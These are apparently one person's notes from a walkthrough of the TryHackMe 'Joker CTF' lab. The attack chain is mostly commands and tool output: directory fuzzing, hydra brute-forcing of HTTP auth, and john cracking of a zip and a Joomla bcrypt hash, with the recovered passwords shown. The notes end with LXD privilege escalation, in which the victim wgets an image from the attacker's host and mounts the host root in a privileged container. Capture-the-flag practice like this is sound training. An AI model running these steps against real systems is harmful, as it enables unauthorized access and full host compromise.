ffuf -u http://10.10.79.96/FUZZ -w /usr/share/wordlists/dirb/common.txt
10.10.79.96

gobuster dir -u http://jokerctf.thm/ -w /usr/share/wordlists/dirb/common.txt -q -t 15 -x php,html,txt

dirb http://10.10.79.96/ -X .txt 

ffuf -w /usr/share/wordlists/dirb/common.txt -u http://jokerctf.thm/FUZZ -e .aspx,.html,.php,.txt



hydra -l joker -P /usr/share/wordlists/rockyou.txt '10.10.79.96' -s 8080 http-get -t 64
or
hydra -l joker -P /usr/share/wordlists/rockyou.txt -f jokerctf.thm -s 8080 http-get


Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-11-14 00:10:33
[WARNING] You must supply the web page as an additional option or via -m, default path set to /
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking http-get://10.10.79.96:8080/
[8080][http-get] host: 10.10.79.96   login: joker   password: hannah
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-11-14 00:11:14

login: joker   password: hannah

ffuf -w /usr/share/wordlists/dirb/common.txt -u http://10.10.79.96:8080/FUZZ -e .aspx,.html,.php,.txt

gobuster dir -u http://10.10.79.96:8080/ -w /usr/share/wordlists/dirb/common.txt -q -t 15 -x php,html,txt,bak,sh,cgi

gobuster dir -u http://10.10.79.96:8080/ -U joker -P hannah -w /usr/share/dirb/wordlists/common.txt -x txt,html,sh,cgi,zip,bak


http://10.10.79.96:8080/administrator/

gobuster dir -u http://10.10.79.96:8080/administrator/ -U joker -P hannah -w /usr/share/dirb/wordlists/common.txt -x txt,html,sh,cgi,zip,bak


nikto -h 10.10.79.96:8080 -id joker:hannah

....
+ /backup.zip: Potentially interesting archive/cert file found.

zip2john backup.zip > hash 

john hash --wordlist=/usr/share/wordlists/rockyou.txt
...hannah


cat db/joomladb.sql | grep Duper

INSERT INTO `cc1gr_users` VALUES (547,'Super Duper User','admin','admin@example.com','$2y$10$b43UqoH5UpXokj2y9e/8U.LD8T3jEQCuxG2oHzALoJaj9M5unOcbG',0,1,'2019-10-08 12:00:15','2019-10-25 15:20:02','0','{\"admin_style\":\"\",\"admin_language\":\"\",\"language\":\"\",\"editor\":\"\",\"helpsite\":\"\",\"timezone\":\"\"}','0000-00-00 00:00:00',0,'','',0);


vi hash2
$2y$10$b43UqoH5UpXokj2y9e/8U.LD8T3jEQCuxG2oHzALoJaj9M5unOcbG


john hash2 --wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
abcd1234         (?)
1g 0:00:00:23 DONE (2021-11-14 00:58) 0.04231g/s 43.41p/s 43.41c/s 43.41C/s bullshit..bulldogs
Use the "--show" option to display all of the cracked passwords reliably
Session completed


admin:abcd1234


on Kali machine
git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine


on victim
wget 10.11.52.16:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
lxc image list
lxc init myimage mycontainer -c security.privileged=true
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
lxc start mycontainer
lxc exec mycontainer /bin/sh
id

cd /mnt/root/root
ls    
final.txt



https://github.com/saghul/lxd-alpine-builder
https://www.hackingarticles.in/lxd-privilege-escalation/


https://tryhackme.com/room/jokerctf
https://marcorei7.wordpress.com/2020/10/26/083-ha-joker-ctf/
https://sckull.github.io/posts/jokerctf/
https://fr33s0ul.tech/jockerctf-write-up/

    LinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
    LinEnum: https://github.com/rebootuser/LinEnum
    LES (Linux Exploit Suggester): https://github.com/mzet-/linux-exploit-suggester
    Linux Smart Enumeration: https://github.com/diego-treitos/linux-smart-enumeration
    Linux Priv Checker: https://github.com/linted/linuxprivchecker 
    
